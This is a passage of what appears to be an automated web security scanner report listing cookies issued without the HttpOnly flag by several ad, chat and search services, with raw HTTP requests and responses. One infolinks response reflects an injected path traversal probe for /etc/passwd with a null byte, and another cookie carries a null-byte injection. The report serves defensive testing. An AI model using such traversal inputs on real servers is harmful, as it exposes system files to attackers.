Referer: http://resources.infolinks.com/flash/ic4.swf
Content-Length: 11273
Origin: http://www.toofab.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: application/x-www-form-urlencoded;charset=utf-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; cnoi=0

makey=46435d41405d4241405d4243455c42404245414143444b40474b405c6971&phdrs=exclusive%7Cmelissa%20rivers%20splits%20with%20boyfriend%7Ccomments%7C43%7Cyour%20comment%7Creply%20to%20comment%7Coriginal%20c
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Set-Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; Domain=infolinks.com; Expires=Thu, 05-Oct-2079 04:05:11 GMT; Path=/
Set-Cookie: cnoi=2; Domain=infolinks.com; Expires=Thu, 05-Oct-2079 04:05:11 GMT; Path=/
P3P: CP="NON DSP NID OUR COR"
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 1583
Date: Sat, 17 Sep 2011 00:51:03 GMT
Connection: close

data=({rid:'456b3667-d6af-420e-b04b-3efe353e8d3b',fuid:'8d0d791e-8b09-4efc-b8c1-f2d069d5fcec',sentences:{'college':{auth:{ssd:'INLkywXFzH-0oXMvJOgZ5OF1Q756Yvd4u-KMPg-00vMF6YWYlF_3yByMSC4EaFOf4g7b8X7wu
...[SNIP]...

12.160. http://rt1804.infolinks.com/action/doq.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rt1804.infolinks.com
Path:   /action/doq.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /action/doq.htm?pcode=utf-8&r=1316239196124.1 HTTP/1.1
Host: rt1804.infolinks.com
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/2011/09/15/ashlee-simpson-vincent-piazza-boardwalk-empire-premiere-photos/
Content-Length: 5420
Cache-Control: max-age=0
Origin: http://www.toofab.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; cnoi=6

pid=159065&wsid=1&ptxt=photos%7Cit%27s+official%7Cashlee+simpson%7Cvincent+piazza%7Chave+gone+public%7Cwhile+the+two+have+already+been+spotted%7Con+the+sidewalks+of+new+york%7Cashlee+stepped+out+on+th
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Set-Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec%00daa02; Domain=infolinks.com; Expires=Thu, 05-Oct-2079 04:23:14 GMT; Path=/
Set-Cookie: cnoi=80; Domain=infolinks.com; Expires=Thu, 05-Oct-2079 04:23:14 GMT; Path=/
P3P: CP="NON DSP NID OUR COR"
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 1723
Date: Sat, 17 Sep 2011 01:09:07 GMT
Connection: close

<script type="text/javascript">var data="({rid:'a7ad3562-1372-4dfd-befa-91c031751d48',fuid:'8d0d791e-8b09-4efc-b8c1-f2d069d5fcec%00daa02',sentences:{'official':{auth:{ssd:'NVQSiVxQEslfRVw0fiiMFfBU1U0B
...[SNIP]...

12.161. http://rt1901.infolinks.com/action/doq.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rt1901.infolinks.com
Path:   /action/doq.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /action/doq.htm?pcode=utf-8&r=1316238723239.1 HTTP/1.1
Host: rt1901.infolinks.com
Proxy-Connection: keep-alive
Referer: http://resources.infolinks.com/flash/ic4.swf
Content-Length: 6869
Origin: http://www.toofab.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: application/x-www-form-urlencoded;charset=utf-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

twnum=160&page%5Fkeyw=hollywood%20news%2Cred%20carpet%20fashion%2Ccelebrity%20hairstyles%2Ccelebrity%20beauty%20buzz%2Ccelebrity%20gossip%2Cacademy%20awards%2Coscars%2Ccelebrity%20makeup%2Ccelebrity%2
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Set-Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; Domain=infolinks.com; Expires=Thu, 05-Oct-2079 04:04:46 GMT; Path=/
Set-Cookie: cnoi=1; Domain=infolinks.com; Expires=Thu, 05-Oct-2079 04:04:46 GMT; Path=/
P3P: CP="NON DSP NID OUR COR"
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 1599
Date: Sat, 17 Sep 2011 00:50:39 GMT
Connection: close

data=({rid:'7fbf5229-56c4-45d9-9756-4d0d190b0283',fuid:'8d0d791e-8b09-4efc-b8c1-f2d069d5fcec',sentences:{'reproduction':{auth:{ssd:'DKSkmBitGooNJ0g9jHlLv4GT0FIHNem2X3fUj7h7iiq3FrZzs4h8vskByE2Jz6KPrF2u
...[SNIP]...

12.162. http://rt1903.infolinks.com/action/doq.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rt1903.infolinks.com
Path:   /action/doq.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /action/doq.htm?pcode=utf-8&r=1316239125575.1 HTTP/1.1
Host: rt1903.infolinks.com
Proxy-Connection: keep-alive
Referer: http://resources.infolinks.com/flash/ic4.swf
Content-Length: 9173
Origin: http://www.tmz.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: application/x-www-form-urlencoded;charset=utf-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; cnoi=4

pdesc=%20justin%20timberlake%20wants%20to%20make%20it%20clear%2Cthe%20explicit%20picture%20on%20mila%20kunis%2Ccell%20phone%2Cshowing%20a%20penis%2Cis%20not%20j%2Ct%2Cthis%20according%20to%20a%E2%80%A
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Set-Cookie: cuid="8d0d791e-8b09-4efc-b8c1-f2d069d5fcec../../../../../../../../etc/passwd%008d0d791e-8b09-4efc-b8c1-f2d069d5fcec"; Version=1; Domain=infolinks.com; Max-Age=2147483647; Expires=Thu, 05-Oct-2079 04:15:48 GMT; Path=/
Set-Cookie: cnoi=33; Domain=infolinks.com; Expires=Thu, 05-Oct-2079 04:15:48 GMT; Path=/
P3P: CP="NON DSP NID OUR COR"
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 2020
Date: Sat, 17 Sep 2011 01:01:40 GMT
Connection: close

data=({rid:'52e80464-4fd8-49bb-8883-b8102d9272e9',fuid:'8d0d791e-8b09-4efc-b8c1-f2d069d5fcec../../../../../../../../etc/passwd%008d0d791e-8b09-4efc-b8c1-f2d069d5fcec',sentences:{'cell phone':{auth:{ss
...[SNIP]...

12.163. http://sales.liveperson.net/hc/25199332/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/25199332/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/25199332/?&site=25199332&cmd=mTagKnockPage&lpCallId=404940335600-874427190357&protV=20&lpjson=1&id=9378898122&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-csol-usen-v16%7ClpMTagConfig.db1%7Clpbutton%7C HTTP/1.1
Host: sales.liveperson.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www-304.ibm.com/support/operations/us/en/invoicespayments?lnk=mhmy
Cookie: LivePersonID=LP i=546022977410,d=1312768968; HumanClickACTIVE=1316119585666

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:57:35 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=60220520663482226; path=/hc/25199332
Set-Cookie: HumanClickACTIVE=1316203055773; expires=Sat, 17-Sep-2011 19:57:35 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 16 Sep 2011 19:57:35 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 30327

lpConnLib.Process({"ResultSet": {"lpCallId":"404940335600-874427190357","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...

12.164. http://sales.liveperson.net/hc/25199332/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/25199332/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hc/25199332/?&site=25199332&cmd=mTagStartPage&lpCallId=737377865877-888569475522&protV=20&lpjson=1&page=http%3A//www-304.ibm.com/support/operations/us/en/invoicespayments%3Flnk%3Dmhmy&id=9378898122&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-csol-usen&activePlugin=none&cobrowse=true&PV%21unit=csol&PV%21pageLoadTime=1%20sec&PV%21visitorActive=1&SV%21language=usen&title=IBM%20-%20Customer%20Support%20OnLine%20-%20Invoices%20and%20payments%20-%20United%20States&referrer=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&cobrowse=true&cookie=ibmSurvey%3D1316220781236%3B%20pSite%3Dhttp%253A//www.ibm.com/developerworks/forums/thread.jspa%253FmessageID%253D14644760%3B%20UnicaNIODID%3DoNxUBOiFZhX-XKsQQhu%3B%20mbox%3Dcheck%23true%231316221073%7Csession%231316221012167-554408%231316222873%7CPC%231316221012167-554408.19%231317430615%3B%20JSESSIONID%3D0000Ycxvbrn8umxUP8OQK7d6xWH%3A115n6m9fm HTTP/1.1
Host: sales.liveperson.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www-304.ibm.com/support/operations/us/en/invoicespayments?lnk=mhmy
Cookie: HumanClickKEY=1753363928878018642; LivePersonID=LP i=546022977410,d=1312768968; HumanClickACTIVE=1316203054138

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:57:37 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_25199332=STANDALONE; path=/hc/25199332
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 16 Sep 2011 19:57:37 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 188

lpConnLib.Process({"ResultSet": {"lpCallId":"737377865877-888569475522","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INPAGE-DELAY-30", "js_code": "lpMTag.lpInPageRequestDelay=30;"}]}});

12.165. http://search.yahoo.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.yahoo.com
Path:   /search

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /search?p=xss&fr=ush_on_omg&ygmasrchbtn=Web+Search HTTP/1.1
Host: search.yahoo.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=016e3b4e6615bdb5; AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxf=3078081@1@223.1071929@2@223.3078101@1@234.3096072@1@234; adx=c166842@1316325303@1

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:55:53 GMT
Set-Cookie: D=; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: sSN=S.z71v42wWEd8IkrDNTSF4z4HfduzcJvMR.qh2he3jJWUHrogBZZsyddfKXoaCSftpnljkatdq7LaTnttAxYUw--; path=/; domain=.search.yahoo.com
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 39043

<!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><script>var pL=0, pUrl='http://ybinst0.ec.yimg.com/ec/fd/ls/l?IG=4a06753004154c2fae4e73f019206d4
...[SNIP]...

12.166. http://sensor2.suitesmart.com/sensor4.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sensor2.suitesmart.com
Path:   /sensor4.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sensor4.js?GID=15493;CRE=;PLA=;ADI=; HTTP/1.1
Host: sensor2.suitesmart.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: G15740=C1S104345-1-0-0-0-1314814746-0; spass=a1bfb027540676fe37eda0dd3047b05c; G15493=C1S99917-2-0-0-0-1315313090-0; G14853=C1S98373-1-0-0-0-1315398787-0

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:52:45 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: G15493=C1S99917-3-0-0-0-1315313090-907675; path=/; domain=.suitesmart.com; expires=Thu, 15-Mar-2012 00:52:45 GMT
Pragma: no-cache
Cache-control: no-cache
P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" , policyref="http://www.suitesmart.com/privacy/p3p/policy.p3p"
Connection: close
Content-Type: text/html
Expires: Sat, 17 Sep 2011 00:52:45 GMT
Content-Length: 376

<!--
var serviceFlag = typeof(serviceFlag) == "undefined" ? false:serviceFlag;
var swCtrl = false;
var snote = 'Sorry SAM';
if (typeof(RunService) == "undefined"){
RunService = new Function();
S
...[SNIP]...

12.167. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23103&kadwidth=728&kadheight=90&kadNetwork=1053&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A7%3A42&ranreq=0.34033529623411596&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=71499648&rk1=83196381&rk2=1316239662.087&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PUBMDCID=1; PMDTSHR=cat:; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:06:16 GMT
Content-Length: 1833
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:06:16 GMT; path=/
Set-Cookie: _curtime=1316221576; domain=pubmatic.com; expires=Sat, 17-Sep-2011 02:16:16 GMT; path=/
Set-Cookie: pubfreq_27331_23103_438841735=243-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:46:16 GMT; path=/

document.writeln('<'+'script type="text/javascript"> document.writeln(\'<iframe width="728" scrolling="no" height="90" frameborder="0" name="iframe0" allowtransparency="true" marginheight="0" marginwi
...[SNIP]...

12.168. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23101&kadwidth=160&kadheight=600&kadNetwork=661&prevkadIds=23101&kbgColor=&ktextColor=&klinkColor=&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame22733027331&kltstamp=2011-8-17%201%3A8%3A24&ranreq=0.99983213795349&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414307&sd=2x160x600&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=48939657&rk1=13158778&rk2=1316239703.749&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PMDTSHR=cat:; KTPCACOOKIE=YES; PUBMDCID=1

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:06:58 GMT
Content-Length: 1571
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:06:58 GMT; path=/
Set-Cookie: pubfreq_27331_23101_978321027=1058-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:46:58 GMT; path=/

document.write('<div id="http_ad_afy11_netadkomli_ads_frame22733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=wmoAAMNqAAA9WgAAAAAAAAAA
...[SNIP]...

12.169. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23103&kadwidth=728&kadheight=90&kbgColor=&ktextColor=&klinkColor=&pageURL=http://bostonherald.com/includes/processAds.bg&frameName=http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A7%3A41&ranreq=0.5777826504781842&timezone=-5&screenResolution=1920x1200&inIframe=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Finside_track%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; KTPCACOOKIE=YES; USCC=ONE; PUBMDCID=1; PMDTSHR=cat:

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:06:15 GMT
Content-Length: 1939
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:06:14 GMT; path=/
Set-Cookie: pubfreq_27331_23103_135328502=1053-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:46:15 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Sun, 18-Sep-2011 01:06:15 GMT; path=/

document.write('<div id="http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=w
...[SNIP]...

12.170. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=22455&kadwidth=728&kadheight=90&kadNetwork=1053&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A7%3A5&ranreq=0.6880893425550312&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=84147797&rk1=23847443&rk2=1316239624.853&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
